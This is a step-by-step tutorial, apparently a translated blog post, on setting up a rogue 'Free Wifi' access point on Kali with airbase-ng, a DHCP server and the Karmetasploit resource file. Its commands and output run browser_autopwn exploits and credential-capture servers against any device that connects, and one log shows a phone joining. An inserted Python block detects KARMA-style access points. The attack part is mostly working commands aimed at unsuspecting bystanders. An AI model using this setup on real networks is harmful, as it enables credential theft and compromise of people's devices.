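Preface

This article describes in detail how to set up a phishing Wi-Fi access point on Kali, using the Karmetasploit wireless attack suite.

Test environment    Description             IP
Host                kali2020                192.168.1.113
Wireless adapter    D-link 802.11 n wlan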

0x01. Install the DHCP server

apt-get install isc-dhcp-server

After the installation succeeds, create a custom configuration.

0x02. Change the configuration file

The current directory is /root/桌面

option domain-name-servers 10.0.0.1;
default-lease-time 60;
max-lease-time 72;
ddns-update-style none;
authoritative;
log-facility local7;
subnet 10.0.0.0 netmask 255.255.255.0{
range 10.0.0.100 10.0.0.254;
option routers 10.0.0.1;
option domain-name-servers 10.0.0.1;
}

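Next, replace the original configuration with the custom one (don't forget to back up the original configuration).

cp /etc/dhcp/dhcpd.conf /etc/dhcp/dhcpd.conf.back  # back up
mv dhcpd.conf /etc/dhcp/dhcpd.conf  # replace

0x03. Download the KARMA resource file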

wget https://www.offensive-security.com/wp-content/uploads/2015/04/karma.rc_.txt

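0x04. Put the wireless adapter into monitor mode

iwconfig  # list the wireless adapters
airmon-ng start wlan0  # switch to monitor mode

0x05. Create the fake Wi-Fi access point

-P     respond to all probes
-C 30  beacon every 30 seconds
-e     use "Free Wifi" as the ESSID
-v     run in verbose (debug) mode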

airbase-ng -P -C 30 -e "Free Wifi" -v wlan0mon

Partial output

┌──(root💀kali)-[/etc/dhcp]
└─# airmon-ng start wlan0                                                                                                                          1 ⨯

Found 2 processes that could cause trouble.
Kill them using 'airmon-ng check kill' before putting
the card in monitor mode, they will interfere by changing channels
and sometimes putting the interface back in managed mode

    PID Name
    536 NetworkManager
    772 wpa_supplicant

PHY     Interface       Driver          Chipset

phy0    wlan0           rt2800usb       D-Link Corp. DWA-140 RangeBooster N Adapter(rev.B3) [Ralink RT5372]
                (mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)
                (mac80211 station mode vif disabled for [phy0]wlan0)

                                                                                                                                                       
┌──(root💀kali)-[/etc/dhcp]
└─# airbase-ng -P -C 30 -e "Free Wifi" -v wlan0mon
21:47:31  Created tap interface at0
21:47:31  Trying to set MTU on at0 to 1500
21:47:31  Trying to set MTU on wlan0mon to 1800
21:47:31  Access Point with BSSID E8:CC:18:C2:33:B4 started.
21:47:31  Got broadcast probe request from 70:66:55:B2:BD:83
21:47:31  Got broadcast probe request from 70:66:55:B2:BD:83
21:47:31  Got broadcast probe request from DA:A1:19:94:66:75
21:47:31  Got directed probe request from DA:A1:19:94:66:75 - "wwwwww"
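
Because `-P` makes the access point answer probe requests for any network name (the log above shows it hearing a directed probe for "wwwwww"), a monitoring sensor can key on that behaviour. The following detection logic is an added example, not part of the original post: it flags a BSSID that answers for a canary SSID no real network uses, or that advertises many SSIDs in a short window. The frame records, the canary name, the `CorpNet` SSIDs, the second BSSID and the thresholds are constructed assumptions.

```python
from collections import defaultdict

# Constructed sample observations (not captured traffic): beacons and probe
# responses seen by a monitoring sensor, as (seconds, frame_type, bssid, ssid).
# The first BSSID and the SSIDs "Free Wifi" / "wwwwww" mirror the log above.
SAMPLE_FRAMES = [
    (0.0, "beacon", "E8:CC:18:C2:33:B4", "Free Wifi"),
    (0.4, "probe_resp", "E8:CC:18:C2:33:B4", "wwwwww"),
    (1.1, "probe_resp", "E8:CC:18:C2:33:B4", "CorpNet"),
    (1.5, "beacon", "AA:BB:CC:00:11:22", "CorpNet"),
    (2.0, "probe_resp", "E8:CC:18:C2:33:B4", "canary-7f3a91"),
    (2.2, "probe_resp", "AA:BB:CC:00:11:22", "CorpNet"),
    (95.0, "beacon", "AA:BB:CC:00:11:22", "CorpNet-Guest"),
]


def find_karma_aps(frames, canary_ssids=(), max_ssids=2, window=60.0):
    """Return {bssid: [reasons]} for BSSIDs that answer for arbitrary SSIDs.

    Heuristic 1: the BSSID answered for a canary SSID that no real AP serves.
    Heuristic 2: the BSSID advertised more than `max_ssids` distinct SSIDs
    within `window` seconds.
    """
    canaries = set(canary_ssids)
    seen = defaultdict(list)  # bssid -> [(time, ssid), ...] in time order
    for ts, _ftype, bssid, ssid in sorted(frames):
        seen[bssid.upper()].append((ts, ssid))

    findings = defaultdict(list)
    for bssid, events in seen.items():
        hit = sorted({s for _, s in events if s in canaries})
        if hit:
            findings[bssid].append("answered canary SSID: " + ", ".join(hit))
        start, worst = 0, set()
        for end, (ts, _ssid) in enumerate(events):  # sliding time window
            while ts - events[start][0] > window:
                start += 1
            ssids = {s for _, s in events[start:end + 1]}
            if len(ssids) > len(worst):
                worst = ssids
        if len(worst) > max_ssids:
            findings[bssid].append("%d SSIDs within %ds: %s" % (
                len(worst), window, ", ".join(sorted(worst))))
    return dict(findings)


if __name__ == "__main__":
    for bssid, reasons in find_karma_aps(SAMPLE_FRAMES, ["canary-7f3a91"]).items():
        print(bssid, reasons)
```
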

0x06. Bring up the at0 interface and run the DHCP service

ifconfig at0 up 10.0.0.1 netmask 255.255.255.0
Brings up the at0 interface with 10.0.0.1 as its IP address.

touch /var/lib/dhcp/dhcpd.leases
Creates the DHCP server lease file.

dhcpd -cf /etc/dhcp/dhcpd.conf at0
Runs the DHCP server on the at0 interface.

ps aux |grep dhcpd
Checks whether dhcpd is running.

tail -f /var/log/messages
Follows the log: shows when IP addresses are handed out.

Partial output

┌──(root💀kali)-[~]
└─# ifconfig at0 up 10.0.0.1 netmask 255.255.255.0
                                                                                                                                                       
┌──(root💀kali)-[~]
└─# touch /var/lib/dhcp/dhcpd.leases
                                                                                                                                                       
┌──(root💀kali)-[~]
└─# dhcpd -cf /etc/dhcp/dhcpd.conf at0
Internet Systems Consortium DHCP Server 4.4.1
Copyright 2004-2018 Internet Systems Consortium.
All rights reserved.
For info, please visit https://www.isc.org/software/dhcp/
Config file: /etc/dhcp/dhcpd.conf
Database file: /var/lib/dhcp/dhcpd.leases
PID file: /var/run/dhcpd.pid
Wrote 1 leases to leases file.
Listening on LPF/at0/e8:cc:18:c2:33:b4/10.0.0.0/24
Sending on   LPF/at0/e8:cc:18:c2:33:b4/10.0.0.0/24
Sending on   Socket/fallback/fallback-net
                                                                                                                                                       
┌──(root💀kali)-[~]
└─# tail -f /var/log/messages       
Jun 23 21:47:31 kali kernel: [ 1524.862886] tun: Universal TUN/TAP device driver, 1.6
Jun 23 21:47:53 kali dhcpd[1427]: Internet Systems Consortium DHCP Server 4.4.1
Jun 23 21:47:53 kali dhcpd[1427]: Copyright 2004-2018 Internet Systems Consortium.
Jun 23 21:47:53 kali dhcpd[1427]: All rights reserved.
Jun 23 21:47:53 kali dhcpd[1427]: For info, please visit https://www.isc.org/software/dhcp/
Jun 23 21:47:53 kali dhcpd[1427]: Wrote 1 leases to leases file.
Jun 23 21:47:53 kali dhcpd[1427]: Listening on LPF/at0/e8:cc:18:c2:33:b4/10.0.0.0/24
Jun 23 21:47:53 kali dhcpd[1427]: Sending on   LPF/at0/e8:cc:18:c2:33:b4/10.0.0.0/24
Jun 23 21:47:53 kali dhcpd[1427]: Sending on   Socket/fallback/fallback-net
Jun 23 21:47:53 kali dhcpd[1427]: Server starting service.

0x07. Load the KARMA resource file

Start Metasploit

msfconsole
resource karma.rc_.txt 

Partial output

msf6 > resource karma.rc_.txt
[*] Processing /root/桌面/karma.rc_.txt for ERB directives.
resource (/root/桌面/karma.rc_.txt)> db_connect postgres:toor@127.0.0.1/msfbook
[-] Failed to connect to the Postgres data service: could not connect to server: Connection refused
        Is the server running on host "127.0.0.1" and accepting
        TCP/IP connections on port 5432?

resource (/root/桌面/karma.rc_.txt)> use auxiliary/server/browser_autopwn
resource (/root/桌面/karma.rc_.txt)> setg AUTOPWN_HOST 10.0.0.1
AUTOPWN_HOST => 10.0.0.1
resource (/root/桌面/karma.rc_.txt)> setg AUTOPWN_PORT 55550
AUTOPWN_PORT => 55550
resource (/root/桌面/karma.rc_.txt)> setg AUTOPWN_URI /ads
AUTOPWN_URI => /ads
resource (/root/桌面/karma.rc_.txt)> set LHOST 10.0.0.1
LHOST => 10.0.0.1
resource (/root/桌面/karma.rc_.txt)> set LPORT 45000
LPORT => 45000
resource (/root/桌面/karma.rc_.txt)> set SRVPORT 55550
SRVPORT => 55550
resource (/root/桌面/karma.rc_.txt)> set URIPATH /ads
URIPATH => /ads
resource (/root/桌面/karma.rc_.txt)> run
[*] Auxiliary module running as background job 0.
resource (/root/桌面/karma.rc_.txt)> use auxiliary/server/capture/pop3
resource (/root/桌面/karma.rc_.txt)> set SRVPORT 110

[*] Setup
SRVPORT => 110
resource (/root/桌面/karma.rc_.txt)> set SSL false
...

resource (/root/桌面/karma.rc_.txt)> run
[*] Auxiliary module running as background job 13.

[*] Server started.

0x08. Get a shell

Once this preparation is done, turning on Wi-Fi on a device shows the phishing Wi-Fi we set up.
In the log-following window from earlier you can see the address of the connecting host and the IP address assigned to it.

Jun 23 21:52:39 kali dhcpd[1427]: DHCPREQUEST for 10.0.0.101 (10.0.0.1) from 18:f0:e4:da:21:c7 (MiNote3-liulengtihei) via at0
Jun 23 21:52:39 kali dhcpd[1427]: DHCPACK on 10.0.0.101 to 18:f0:e4:da:21:c7 (MiNote3-liulengtihei) via at0
Jun 23 21:52:39 kali dhcpd[1427]: DHCPREQUEST for 10.0.0.101 (10.0.0.1) from 18:f0:e4:da:21:c7 (MiNote3-liulengtihei) via at0
Jun 23 21:52:39 kali dhcpd[1427]: DHCPACK on 10.0.0.101 to 18:f0:e4:da:21:c7 (MiNote3-liulengtihei) via at0
Jun 23 21:52:39 kali dhcpd[1427]: DHCPREQUEST for 10.0.0.101 (10.0.0.1) from 18:f0:e4:da:21:c7 (MiNote3-liulengtihei) via at0
Jun 23 21:52:39 kali dhcpd[1427]: DHCPACK on 10.0.0.101 to 18:f0:e4:da:21:c7 (MiNote3-liulengtihei) via at0
Jun 23 21:52:39 kali dhcpd[1427]: DHCPREQUEST for 10.0.0.101 (10.0.0.1) from 18:f0:e4:da:21:c7 (MiNote3-liulengtihei) via at0
Jun 23 21:52:39 kali dhcpd[1427]: DHCPACK on 10.0.0.101 to 18:f0:e4:da:21:c7 (MiNote3-liulengtihei) via at0
Jun 23 21:52:39 kali dhcpd[1427]: DHCPREQUEST for 10.0.0.101 (10.0.0.1) from 18:f0:e4:da:21:c7 (MiNote3-liulengtihei) via at0
Jun 23 21:52:39 kali dhcpd[1427]: DHCPACK on 10.0.0.101 to 18:f0:e4:da:21:c7 (MiNote3-liulengtihei) via at0

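When the user opens a web page, the default phishing page appears, and msf attacks the user with multiple payloads until it obtains a shell (I tried many times and could not get a connection).
Once a shell is obtained, a session is created; I won't go into what follows.


Summary

This article described in detail how to use Karmetasploit to set up a phishing Wi-Fi access point and perform penetration testing against the users who connect. For learning purposes only.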
